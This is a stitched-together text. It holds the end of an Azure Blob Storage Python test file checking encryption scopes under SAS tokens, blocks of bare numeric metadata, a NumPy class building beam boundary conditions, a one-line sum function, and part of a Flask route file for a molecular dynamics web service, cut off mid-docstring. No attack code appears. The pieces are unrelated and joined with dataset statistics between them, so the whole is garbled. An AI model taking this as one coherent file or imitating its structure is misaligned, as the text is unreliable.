            expiry=datetime.utcnow() + timedelta(hours=1),
            encryption_scope=TEST_ENCRYPTION_KEY_SCOPE
        )
        bsc_with_diff_sas_credential = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=token2,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        container_client = bsc_with_diff_sas_credential.get_container_client(self.container_name)
        # The ses field in SAS token when list blobs is different from the encryption scope used on creating blob, while
        # list blobs should also succeed
        generator = container_client.list_blobs(include="metadata")
        for blob in generator:
            self.assertIsNotNone(blob)
            # Assert: every listed blob has encryption_scope
            # and the encryption scope is the same as the one on blob creation
            self.assertEqual(blob.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
        self._teardown(bsc)
    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_copy_with_account_encryption_scope_sas(self, storage_account_name, storage_account_key):
        """Sync-copy a blob; the destination takes the scope from the copy SAS.

        Source is written under TEST_SAS_ENCRYPTION_SCOPE_2; the copy runs
        under a SAS carrying TEST_SAS_ENCRYPTION_SCOPE, which wins on the
        destination.
        """
        # Arrange: account SAS carrying TEST_SAS_ENCRYPTION_SCOPE_2 as 'ses'
        sas_token = generate_account_sas(
            storage_account_name,
            account_key=storage_account_key,
            resource_types=ResourceTypes(object=True, container=True),
            permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
            expiry=datetime.utcnow() + timedelta(hours=1),
            encryption_scope=TEST_SAS_ENCRYPTION_SCOPE_2
        )
        bsc_with_sas_credential = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=sas_token,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc_with_sas_credential)
        # blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE_2
        blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
        # second account SAS carrying a different scope (TEST_SAS_ENCRYPTION_SCOPE)
        sas_token2 = generate_account_sas(
            storage_account_name,
            account_key=storage_account_key,
            resource_types=ResourceTypes(object=True, container=True),
            permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
            expiry=datetime.utcnow() + timedelta(hours=1),
            encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
        )
        bsc_with_account_key_credential = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=sas_token2,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        copied_blob = self.get_resource_name('copiedblob')
        copied_blob_client = bsc_with_account_key_credential.get_blob_client(self.container_name, copied_blob)
        # TODO: to confirm with Sean/Heidi ses in SAS cannot be set for async copy.
        # The test failed for async copy (without requires_sync=True)
        copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True)
        props = copied_blob_client.get_blob_properties()
        self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
        self._teardown(bsc_with_sas_credential)
    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_copy_blob_from_url_with_ecryption_scope(self, storage_account_name, storage_account_key):
        """Sync-copy with an explicit encryption_scope applied to the destination.

        NOTE(review): method name has a typo ("ecryption") — left as-is because
        renaming would change the test's identity and any recorded sessions.
        """
        # Arrange
        # create sas for source blob (no 'ses' on this SAS)
        sas_token = generate_account_sas(
            storage_account_name,
            account_key=storage_account_key,
            resource_types=ResourceTypes(object=True, container=True),
            permission=AccountSasPermissions(read=True, write=True, delete=True, list=True),
            expiry=datetime.utcnow() + timedelta(hours=1),
        )
        bsc_with_sas_credential = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=sas_token,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc_with_sas_credential)
        blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        copied_blob = self.get_resource_name('copiedblob')
        copied_blob_client = bsc.get_blob_client(self.container_name, copied_blob)
        # Act: sync copy with an explicit scope for the destination blob
        copied_blob_client.start_copy_from_url(blob_client.url, requires_sync=True,
                                               encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
        props = copied_blob_client.get_blob_properties()
        self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
        self._teardown(bsc_with_sas_credential)
@pytest.mark.live_test_only
@BlobPreparer()
def test_copy_with_user_delegation_encryption_scope_sas(self, storage_account_name, storage_account_key):
    """Uploading via a user-delegation SAS that carries an encryption scope encrypts the blob with it."""
    # Arrange: obtain a user delegation key through an OAuth token credential.
    oauth_token_credential = self.generate_oauth_token()
    # Tiny transfer limits force the chunked upload/download code paths.
    transfer_limits = dict(
        connection_data_block_size=1024,
        max_single_put_size=1024,
        min_large_block_upload_threshold=1024,
        max_block_size=1024,
        max_page_size=1024,
    )
    service_client = BlobServiceClient(
        self.account_url(storage_account_name, "blob"),
        credential=oauth_token_credential,
        **transfer_limits)
    user_delegation_key = service_client.get_user_delegation_key(
        datetime.utcnow(), datetime.utcnow() + timedelta(hours=1))
    self._setup(service_client)

    # Build a blob-level SAS that embeds the encryption scope.
    blob_name = self.get_resource_name('blob')
    sas_token = generate_blob_sas(
        storage_account_name,
        self.container_name,
        blob_name,
        account_key=user_delegation_key,
        permission=BlobSasPermissions(read=True, write=True, create=True, delete=True),
        expiry=datetime.utcnow() + timedelta(hours=1),
        encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
    )
    bsc_with_delegation_sas = BlobServiceClient(
        self.account_url(storage_account_name, "blob"),
        credential=sas_token,
        **transfer_limits)

    # Act: the upload goes through the scoped SAS.
    blob_client, _ = self._create_block_blob(
        bsc_with_delegation_sas, blob_name=blob_name, data=b'AAABBBCCC', overwrite=True)

    # Assert: the blob was encrypted with the SAS-embedded scope.
    props = blob_client.get_blob_properties()
    self.assertEqual(props.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
    self._teardown(service_client)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n(self, storage_account_name, storage_account_key):
    """A container created with a default encryption scope reports it, and a
    blob-level scope overrides the container default on upload."""
    # Arrange
    bsc = BlobServiceClient(
        self.account_url(storage_account_name, "blob"),
        credential=storage_account_key,
        connection_data_block_size=1024,
        max_single_put_size=1024,
        min_large_block_upload_threshold=1024,
        max_block_size=1024,
        max_page_size=1024)
    container_client = bsc.create_container(
        'cpkcontainer',
        container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE)
    container_props = container_client.get_container_properties()
    self.assertEqual(
        container_props.encryption_scope.default_encryption_scope,
        TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
    self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
    for container in bsc.list_containers(name_starts_with='cpkcontainer'):
        # Fix: assert on each listed container's own properties; the original
        # re-checked `container_props` captured before the loop, so the loop
        # verified nothing about the listing.
        self.assertEqual(
            container.encryption_scope.default_encryption_scope,
            TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
        self.assertEqual(container.encryption_scope.prevent_encryption_scope_override, False)

    blob_client = container_client.get_blob_client("appendblob")
    # Provide an explicit encryption scope when uploading the blob.
    resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
    # The blob-level scope wins over the container default.
    self.assertEqual(resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
    container_client.delete_container()
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n_deny_override(self, storage_account_name, storage_account_key):
    """When the container denies scope override, a blob-level encryption scope
    is rejected and uploads fall back to the container default scope."""
    # Arrange
    bsc = BlobServiceClient(
        self.account_url(storage_account_name, "blob"),
        credential=storage_account_key,
        connection_data_block_size=1024,
        max_single_put_size=1024,
        min_large_block_upload_threshold=1024,
        max_block_size=1024,
        max_page_size=1024)
    container_client = bsc.create_container(
        'denyoverridecpkcontainer',
        container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE
    )
    # NOTE(review): assertions compare against TEST_CONTAINER_ENCRYPTION_KEY_SCOPE;
    # this presumably shares its default scope name with the DENY_OVERRIDE
    # constant — confirm against the constants' definitions.
    container_props = container_client.get_container_properties()
    self.assertEqual(
        container_props.encryption_scope.default_encryption_scope,
        TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
    self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
    for container in bsc.list_containers(name_starts_with='denyoverridecpkcontainer'):
        # Fix: assert on each listed container's own properties; the original
        # re-checked `container_props` captured before the loop, so the loop
        # verified nothing about the listing.
        self.assertEqual(
            container.encryption_scope.default_encryption_scope,
            TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
        self.assertEqual(container.encryption_scope.prevent_encryption_scope_override, True)

    blob_client = container_client.get_blob_client("appendblob")
    # Setting an encryption scope on the blob is rejected when the container
    # denies encryption-scope override.
    with self.assertRaises(HttpResponseError):
        blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
    # Without a blob-level scope, the container default applies.
    resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob)
    self.assertEqual(resp['encryption_scope'], TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
    container_client.delete_container()
# ------------------------------------------------------------------------------
| 45.742026
| 139
| 0.671315
| 5,638
| 48,761
| 5.415218
| 0.056935
| 0.070748
| 0.046674
| 0.038911
| 0.883757
| 0.866169
| 0.845731
| 0.824736
| 0.807638
| 0.785005
| 0
| 0.017835
| 0.247985
| 48,761
| 1,065
| 140
| 45.784977
| 0.814775
| 0.11743
| 0
| 0.753567
| 0
| 0
| 0.035681
| 0.009725
| 0
| 0
| 0
| 0.000939
| 0.151751
| 1
| 0.036316
| false
| 0.002594
| 0.007782
| 0.001297
| 0.051881
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7f8d8704d1c69449ea4bd1c6ad25f66b054165d
| 10,349
|
py
|
Python
|
boundary_conditions.py
|
viswambhar-yasa/IGTO
|
03001db03b17d1d2120740b9d3d7f0efe1f93faf
|
[
"MIT"
] | 4
|
2020-11-23T15:55:08.000Z
|
2022-01-15T17:47:19.000Z
|
boundary_conditions.py
|
bhan5426/IGTO
|
03001db03b17d1d2120740b9d3d7f0efe1f93faf
|
[
"MIT"
] | null | null | null |
boundary_conditions.py
|
bhan5426/IGTO
|
03001db03b17d1d2120740b9d3d7f0efe1f93faf
|
[
"MIT"
] | 3
|
2021-12-27T01:21:33.000Z
|
2022-03-24T10:50:31.000Z
|
#AUTHOR : YASA VISWAMBHAR REDDY
#MATRICULATION NUMBER : 65074
#Personal Programming Project
#--------------------------------------------------------------------------------------------------------------#
#BOUNDARY CONDITIONS - Python file used to generate boundary conditions (element indices)
#--------------------------------------------------------------------------------------------------------------#
import numpy as np
from Preprocessing import Inputs
class BC_Switcher(object):
    '''
    Switch-case style dispatcher that builds boundary conditions
    (fixed/loaded nodes and their DOF indices) for a control-point grid.

    Option :
        0- Cantilever beam with load along the bottom edge of the free end.
        1- Simple supported with load at bottom center.
        2- Cantilever beam with load at corner point of the free end.
        3- Cantilever beam with point load at the free end (2d case loading at y=height and x=length).
        4- Cantilever beam with two forces at either end
        5- Cantilever beam with load along the center of the free end
        6- Simple supported with load at top center.

    Each ``number_<i>`` method returns
        (fixed_indicies, load_indicies, fixed_nodes, load_nodes)
    where node arrays index rows of CONTROL_POINTS and index arrays are
    global DOF numbers (3 DOF per node; the load acts on the y DOF).
    '''

    def __init__(self, CONTROL_POINTS, length, height, width, bc_disp):
        # CONTROL_POINTS: (n, >=3) array; columns 0, 1, 2 are x, y, z.
        self.CONTROL_POINTS = CONTROL_POINTS
        self.length = length
        self.width = width
        self.height = height
        # When truthy, a banner describing the selected case is printed.
        self.bc_disp = bc_disp

    def indirect(self, i):
        """Dispatch to ``number_<i>``; returns the string '0' for an unknown option."""
        method = getattr(self, 'number_' + str(i), lambda: '0')
        return method()

    # ---- internal helpers -------------------------------------------------

    def _banner(self, message):
        """Print a centered, highlighted banner when bc_disp is enabled."""
        if self.bc_disp:
            line_width = 120
            print('\n')
            print('=' * line_width)
            fmt = '{:^' + str(line_width) + '}'
            highlight = '\033[33;1m'   # bold yellow (the original comment said green)
            reset = '\033[m'
            print(highlight + fmt.format(message) + reset)

    def _select(self, x=None, y=None, z=None):
        """Indices of control points matching every coordinate that was given."""
        cp = np.asarray(self.CONTROL_POINTS)
        mask = np.ones(cp.shape[0], dtype=bool)
        if x is not None:
            mask &= cp[:, 0] == x
        if y is not None:
            mask &= cp[:, 1] == y
        if z is not None:
            mask &= cp[:, 2] == z
        return np.where(mask)[0]

    def _load(self, x=None, y=None, z=None):
        """Load nodes at the given location and their (sorted) y-DOF indices."""
        load_nodes = self._select(x=x, y=y, z=z)
        load_indicies = np.sort(3 * load_nodes + 1)  # load applied on the y DOF
        return load_nodes, load_indicies

    def _cantilever_fixed(self):
        """Clamp all three DOFs of every node on the x == 0 face."""
        fixed_nodes = self._select(x=0)
        fixed_indicies = np.sort(np.concatenate(
            (3 * fixed_nodes, 3 * fixed_nodes + 1, 3 * fixed_nodes + 2)))
        return fixed_nodes, fixed_indicies

    def _simply_supported_fixed(self):
        """Pin the bottom z-edges: all DOFs at x == 0, y/z DOFs at x == length."""
        cp = np.asarray(self.CONTROL_POINTS)
        on_z_edge = (cp[:, 2] == 0) | (cp[:, 2] == self.width)
        bottom = cp[:, 1] == 0
        nodes_left = np.where((cp[:, 0] == 0) & bottom & on_z_edge)[0]
        nodes_right = np.where((cp[:, 0] == self.length) & bottom & on_z_edge)[0]
        idx_left = np.sort(np.concatenate(
            (3 * nodes_left, 3 * nodes_left + 1, 3 * nodes_left + 2)))
        idx_right = np.sort(np.concatenate((3 * nodes_right + 1, 3 * nodes_right + 2)))
        fixed_nodes = np.sort(np.concatenate((nodes_left, nodes_right)))
        fixed_indicies = np.sort(np.concatenate((idx_left, idx_right)))
        return fixed_nodes, fixed_indicies

    # ---- boundary-condition cases ----------------------------------------

    def number_0(self):
        # nz should be odd
        self._banner(' Cantilever beam with load along the bottom edge of the free end')
        fixed_nodes, fixed_indicies = self._cantilever_fixed()
        # Load along the whole bottom edge (any z) of the free end.
        load_nodes, load_indicies = self._load(x=self.length, y=0)
        return fixed_indicies, load_indicies, fixed_nodes, load_nodes

    def number_1(self):
        # nx and ny should be odd elements
        self._banner(' Simple supported with load at bottom center')
        fixed_nodes, fixed_indicies = self._simply_supported_fixed()
        load_nodes, load_indicies = self._load(x=self.length / 2, y=0, z=self.width / 2)
        return fixed_indicies, load_indicies, fixed_nodes, load_nodes

    def number_2(self):
        self._banner(' Cantilever beam with load at corner point of free end')
        fixed_nodes, fixed_indicies = self._cantilever_fixed()
        load_nodes, load_indicies = self._load(x=self.length, y=0, z=0)
        return fixed_indicies, load_indicies, fixed_nodes, load_nodes

    def number_3(self):
        self._banner('Cantilever beam with point load at the free end (2d case loading at y=height and x=length) ')
        fixed_nodes, fixed_indicies = self._cantilever_fixed()
        load_nodes, load_indicies = self._load(x=self.length, y=0, z=self.width / 2)
        return fixed_indicies, load_indicies, fixed_nodes, load_nodes

    def number_4(self):
        self._banner('Cantilever beam with two forces at either end')
        fixed_nodes, fixed_indicies = self._cantilever_fixed()
        # Two load locations (bottom and top of the free end) -> lists of arrays.
        load_nodes = []
        load_indicies = []
        for y_pos in (0, self.height):
            nodes, indices = self._load(x=self.length, y=y_pos, z=self.width / 2)
            load_nodes.append(nodes)
            load_indicies.append(indices)
        return fixed_indicies, load_indicies, fixed_nodes, load_nodes

    def number_5(self):
        # ny and nz should be odd
        self._banner(' Cantilever beam with load along the center of the free end')
        fixed_nodes, fixed_indicies = self._cantilever_fixed()
        load_nodes, load_indicies = self._load(x=self.length, y=self.height / 2, z=self.width / 2)
        return fixed_indicies, load_indicies, fixed_nodes, load_nodes

    def number_6(self):
        # nx and ny should be odd elements
        # Fix: the banner previously said "bottom center" (copy-paste from
        # number_1); option 6 loads the top center per the class docstring.
        self._banner(' Simple supported with load at top center')
        fixed_nodes, fixed_indicies = self._simply_supported_fixed()
        load_nodes, load_indicies = self._load(x=self.length / 2, y=self.height, z=self.width / 2)
        return fixed_indicies, load_indicies, fixed_nodes, load_nodes
| 50.237864
| 252
| 0.641221
| 1,468
| 10,349
| 4.382834
| 0.089237
| 0.129313
| 0.166459
| 0.150451
| 0.907833
| 0.903326
| 0.903171
| 0.894311
| 0.873485
| 0.869288
| 0
| 0.031366
| 0.217509
| 10,349
| 206
| 253
| 50.237864
| 0.763151
| 0.159726
| 0
| 0.734848
| 0
| 0.007576
| 0.066141
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.015152
| 0
| 0.151515
| 0.159091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bdebe9871a3607566546160e6ca45aeb8acf508
| 38
|
py
|
Python
|
ac.py
|
ReehGon/AC-DevOps
|
fcc71e8e8408eb9f7ce671c734f487aacae9ea90
|
[
"Apache-2.0"
] | null | null | null |
ac.py
|
ReehGon/AC-DevOps
|
fcc71e8e8408eb9f7ce671c734f487aacae9ea90
|
[
"Apache-2.0"
] | null | null | null |
ac.py
|
ReehGon/AC-DevOps
|
fcc71e8e8408eb9f7ce671c734f487aacae9ea90
|
[
"Apache-2.0"
] | null | null | null |
def soma(n1, n2):
    """Return the sum of *n1* and *n2* (Portuguese: "soma" = sum)."""
    return n1 + n2
| 12.666667
| 20
| 0.552632
| 7
| 38
| 3
| 0.714286
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0.263158
| 38
| 2
| 21
| 19
| 0.607143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
0be5a8dfd91d689ef2ca3245b82fc7c492088a87
| 70,311
|
py
|
Python
|
app/routes.py
|
LABIOQUIM/visualdynamics
|
41cbedd88f3405283d4d1ec829a106569b8691fa
|
[
"MIT"
] | 6
|
2020-07-18T05:17:28.000Z
|
2022-03-31T09:58:40.000Z
|
app/routes.py
|
LABIOQUIM/visualdynamics
|
41cbedd88f3405283d4d1ec829a106569b8691fa
|
[
"MIT"
] | 4
|
2020-02-05T14:59:25.000Z
|
2022-03-23T19:45:00.000Z
|
app/routes.py
|
LABIOQUIM/visualdynamics
|
41cbedd88f3405283d4d1ec829a106569b8691fa
|
[
"MIT"
] | 1
|
2022-01-15T13:56:28.000Z
|
2022-01-15T13:56:28.000Z
|
from os import path, remove
from app import app, login_manager, db
from flask import render_template, request, redirect, url_for, flash, send_file, current_app
from .models import User
from flask_login import logout_user, login_required, login_user, current_user
from .config import os, Config
from .generate import generate
from .generateLig import generateLig
from .generateLigACPYPE import generateLigACPYPE
from .execute import execute
from .executeLig import executelig
from .executeLigACPYPE import executeLigACPYPE
from .upload_file import upload_file, upload_file_ligante
from .checkuserdynamics import CheckUserDynamics, CheckUserDynamicsLig, CheckDynamicsSteps, CheckDynamicsStepsLig
from .admin_required import admin_required
import ast
import errno
import zipfile
import glob
import smtplib
import shutil
from email.mime.text import MIMEText
### cadastro br ###
@app.route('/cadastro', methods=['GET', 'POST'])
def cadastro():
    """Registration page (pt-BR).

    POST: validates the form, rejects duplicate e-mail/username and
    mismatched password confirmation, then stores the account with
    register='False' pending admin approval.
    GET: shows the registration form with an instruction message.
    """
    if request.method == 'POST':
        name = request.form.get('name')
        user = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        passconfirm = request.form.get('passwordconfirm')
        # Fix: the confirmation field was read but never compared, so a typo
        # in either password field went undetected.
        if password != passconfirm:
            flash('Erro, as senhas informadas não coincidem.', 'danger')
            return redirect(url_for('cadastro'))
        # Check whether the username or e-mail is already taken.
        check_email = User.query.filter(User.email == email).first()
        check_user = User.query.filter(User.username == user).first()
        if check_email is None and check_user is None:
            new = User(name=name, username=user, email=email, register='False')
            new.set_password(password)
            db.session.add(new)
            db.session.commit()
            flash('Solicitação de cadastro do(a) Usuário(a) {} realizada com sucesso. Em breve responderemos por Email se a solicitação foi aceita.'.format(user), 'primary')
            return redirect(url_for('login'))
        else:
            flash('Erro, email ou usuário já estão sendo utilizados.', 'danger')
            return redirect(url_for('cadastro'))
    flash('Por favor, preencha os dados corretamente. Em caso de dados incorretos a solicitação de cadastro será cancelada.', 'danger')
    return render_template('cadastro.html')
### cadastro en ###
@app.route('/cadastro_en', methods=['GET', 'POST'])
def cadastro_en():
    """Registration page (English).

    POST: validates the form, rejects duplicate e-mail/username and
    mismatched password confirmation, then stores the account with
    register='False' pending admin approval.
    GET: shows the registration form with an instruction message.
    """
    if request.method == 'POST':
        name = request.form.get('name')
        user = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        passconfirm = request.form.get('passwordconfirm')
        # Fix: the confirmation field was read but never compared, so a typo
        # in either password field went undetected.
        if password != passconfirm:
            flash('Error, the passwords do not match.', 'danger')
            return redirect(url_for('cadastro_en'))
        # Check whether the username or e-mail is already taken.
        check_email = User.query.filter(User.email == email).first()
        check_user = User.query.filter(User.username == user).first()
        if check_email is None and check_user is None:
            new = User(name=name, username=user, email=email, register='False')
            new.set_password(password)
            db.session.add(new)
            db.session.commit()
            flash('User registration request {} carried out successfully. We will respond by email shortly if the request has been accepted. '.format(user), 'primary')
            return redirect(url_for('login_en'))
        else:
            flash('Error, email or user are already being used.', 'danger')
            return redirect(url_for('cadastro_en'))
    flash('Please fill in the data correctly. In case of incorrect data, the registration request will be canceled.', 'danger')
    return render_template('cadastro_en.html')
########################
####login br#####
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Login page (pt-BR): authenticates by username or e-mail."""
    if request.method != 'POST':
        return render_template('login.html')
    entered = request.form.get('username')
    account = User.query.filter((User.username == entered) | (User.email == entered)).first()
    # Reject unknown accounts and wrong passwords alike.
    if account is None or not account.check_password(request.form.get('password')):
        flash('Usuário ou senha inválidos', 'danger')
        return render_template('login.html')
    # Registration must have been approved before login is allowed.
    if account.register == 'False':
        flash('Seu cadastro ainda não foi aceito, aguarde o Email de confirmação.', 'danger')
        return render_template('login.html')
    login_user(account)
    return redirect(url_for('protected'))
@app.route('/protected')
@login_required
def protected():
    """Post-login landing (pt-BR): greet the user and go to the index."""
    greeting = 'Olá {}, seja bem-vindo(a)'.format(current_user.username)
    flash(greeting, 'primary')
    return redirect(url_for('index'))
@app.route('/', methods=['GET', 'POST'], endpoint='index')
@login_required
def index():
    """Dashboard (pt-BR): lists the user's previous dynamics, if any.

    Reads <upload folder>/<username>/info_dynamics; when the file is
    missing (user has no history yet), shows an informational message.
    """
    directory = Config.UPLOAD_FOLDER + '/' + current_user.username + '/info_dynamics'
    try:
        # Fix: use a context manager so the file handle is closed, and catch
        # OSError specifically instead of a bare except that hid real bugs.
        with open(directory, 'r') as info_dynamics:
            list_dynamics = info_dynamics.readlines()
    except OSError:
        flash('Você ainda não realizou nenhuma dinâmica.', 'danger')
        return render_template('index.html', actindex='active')
    return render_template('index.html', actindex='active', list_dynamics=list_dynamics)
########################
#####login_en#####
@app.route('/login_en', methods=['GET', 'POST'])
def login_en():
    """Login page (English): authenticates by username or e-mail."""
    if request.method != 'POST':
        return render_template('login_en.html')
    entered = request.form.get('username')
    account = User.query.filter((User.username == entered) | (User.email == entered)).first()
    # Reject unknown accounts and wrong passwords alike.
    if account is None or not account.check_password(request.form.get('password')):
        flash('Username or password is invalid ', 'danger')
        return render_template('login_en.html')
    # Registration must have been approved before login is allowed.
    if account.register == 'False':
        flash('Your registration has not yet been accepted, wait for the confirmation email.', 'danger')
        return render_template('login_en.html')
    login_user(account)
    return redirect(url_for('protected_en'))
@app.route('/protected_en')
@login_required
def protected_en():
    """Post-login landing (English): greet the user and go to the index."""
    greeting = 'Hi {}, Welcome'.format(current_user.username)
    flash(greeting, 'primary')
    return redirect(url_for('index_en'))
@app.route('/en', methods=['GET', 'POST'], endpoint='index_en')
@login_required
def index_en():
    """Dashboard (English): lists the user's previous dynamics, if any.

    Reads <upload folder>/<username>/info_dynamics; when the file is
    missing (user has no history yet), shows an informational message.
    """
    directory = Config.UPLOAD_FOLDER + '/' + current_user.username + '/info_dynamics'
    try:
        # Fix: use a context manager so the file handle is closed, and catch
        # OSError specifically instead of a bare except that hid real bugs.
        with open(directory, 'r') as info_dynamics:
            list_dynamics = info_dynamics.readlines()
    except OSError:
        flash('You havent performed any dynamics yet.', 'danger')
        return render_template('index_en.html', actindex='active')
    return render_template('index_en.html', actindex='active', list_dynamics=list_dynamics)
#################################
### livre br ###
@app.route('/livre', methods=['GET', 'POST'], endpoint='livre')
@login_required
def livre():
    """Free (protein-only) dynamics page, pt-BR version.

    POST: generates the MD command script from the form, then either offers
    it for download or uploads the structure file and launches the run.
    Always: if this user has a run in progress, renders the page with its
    step list and, once production MD has started, the last 'step' line of
    the GROMACS log as the estimated finish info.

    NOTE(review): nesting reconstructed from whitespace-stripped source —
    confirm against the repository before relying on exact control flow.
    """
    if request.method == 'POST':
        file = request.files.get('file')
        CompleteFileName = generate(file.filename,
                                    request.form.get('campoforca'),
                                    request.form.get('modeloagua'),
                                    request.form.get('tipocaixa'),
                                    request.form.get('distanciacaixa'),
                                    request.form.get('neutralize'),
                                    request.form.get('double'),
                                    request.form.get('ignore'),
                                    current_user
                                    )
        if request.form.get('download') == 'Download':
            return redirect(url_for('commandsdownload',
                                    filename={"complete" : CompleteFileName,
                                              "name": file.filename.split('.')[0]}))
        if request.form.get('execute') == 'Executar':
            if upload_file(file, current_user.username):
                # Check whether this user already has a run executing.
                executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
                if not os.path.exists(executing):
                    f = open(executing,'w')
                    f.writelines('{}\n'.format(current_user.username))
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('livre'))
                # The ligand-run marker must also be free (one run per user total).
                executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
                if not os.path.exists(executingLig):
                    f = open(executingLig, 'w')
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('livre'))
                # Prepare to execute.
                MoleculeName = file.filename.split('.')[0]
                filename = file.filename
                AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
                                           current_user.username, MoleculeName , 'run',
                                           'logs/', filename)
                exc = execute(AbsFileName, CompleteFileName, current_user.username, MoleculeName)
                # execute() presumably returns (status, command) — TODO confirm.
                flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
            else:
                flash('Extensão do arquivo está incorreta', 'danger')
    if CheckUserDynamics(current_user.username) == True:
        flash('','steps')
        steplist = CheckDynamicsSteps(current_user.username)
        archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executing', "r")
        lines = archive.readlines()
        archive.close()
        last_line = lines[len(lines)-1]
        # Check whether the run has already reached production MD.
        if last_line == '#productionmd\n':
            # Read the path of the execution log.
            archive = open(Config.UPLOAD_FOLDER + current_user.username+ '/DirectoryLog', 'r')
            directory = archive.readline()
            archive.close()
            # Open the execution log itself.
            archive = open(directory,'r')
            lines = archive.readlines()
            archive.close()
            # Take the last line of the log.
            last_line = lines[len(lines)-1]
            if last_line.find('step ') > -1:
                # Grab the step count and the estimated finish date.
                date_finish = last_line
                archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
                name_dynamic = archive.readline()
                archive.close()
                return render_template('livre.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
            # NOTE(review): the log file was already closed above — this extra
            # close is redundant but harmless.
            archive.close()
        archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
        name_dynamic = archive.readline()
        archive.close()
        return render_template('livre.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic)
    return render_template('livre.html', actlivre = 'active')
################
##### livre en #####
@app.route('/livre_en', methods=['GET', 'POST'], endpoint='livre_en')
@login_required
def livre_en():
    """Free (protein-only) dynamics page, English version.

